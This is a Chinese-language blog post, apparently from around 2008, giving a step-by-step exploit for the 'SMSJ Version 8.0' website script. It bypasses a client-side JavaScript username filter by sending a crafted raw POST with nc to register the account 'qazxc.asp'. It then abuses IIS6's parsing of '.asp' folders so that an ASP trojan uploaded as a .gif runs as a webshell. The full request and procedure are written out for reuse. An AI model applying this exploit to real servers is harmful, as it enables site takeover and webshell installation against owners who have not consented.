最新SMSJ Version 8.0漏洞

　　帮朋友检测网站的安全性，用的是SMSJ Version 8.0，号称仿阿里巴巴的东西，注册企业会员后，登录管理，发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩，想起早期动易的那个注册漏洞

　　说起这个漏洞，完全是iis6引起的，在iis6的站点上，建立一个xx.asp的文件夹，然后在里面放一个改成gif后缀的asp木马，照样会按asp来执行，看了下服务器，八成是win2003,也就是iis6了然后我试着注册rover.asp的用户，注册那里到是过滤了特殊字符的，但是看了下，只是用简单的javascript限制的

　　代码如下：

　　function checkdata() {

　　if( isNumberString(addform.user.value,"1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_")!=1 || addform.user.value.length<2 || addform.user.value.length>16) {

　　alert("用户注册出错，下面是产生错误的可能原因：\n ·用户名必须是2-16位的数字、英文或下划线")

　　return false;

　　ok,抓包，然后用nc提交，直接绕过

　　抓包内容

　　POST /reg_save.asp HTTP/1.1

　　Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

　　application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

　　Referer: http://www.rover.com/reg.asp?action=reg

　　Accept-Language: zh-cn

　　Content-Type: application/x-www-form-urlencoded

　　UA-CPU: x86

　　Accept-Encoding: gzip, deflate

　　User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;

　　.NET CLR 2.0.50727)

　　Host: www.rover.com

　　Content-Length: 230

　　Connection: Keep-Alive

　　Cache-Control: no-cache

　　Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0;

　　ltime=1206546036500; cnzz_eid=96831333-

　　user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136&coname=rover&colxr=a

　　dmin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490&coaddress=xxxxx&cotelq=010&cotel=384

　　76564&mail=icerover@msn.com&vip=3&img.x=58&img.y=17

　　nc ip 80成功注册，然后把asp木马改成gif后缀，当图片上传上去

　　http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.gif

　　自此得到webshell，over~最近懒的说话，懒得修饰文笔，看不懂的就一直跳过跳过...

　　ps:漏洞很简单，好久不写字了，纯粹憋字而已，见笑了，此外，还可以本地提交注册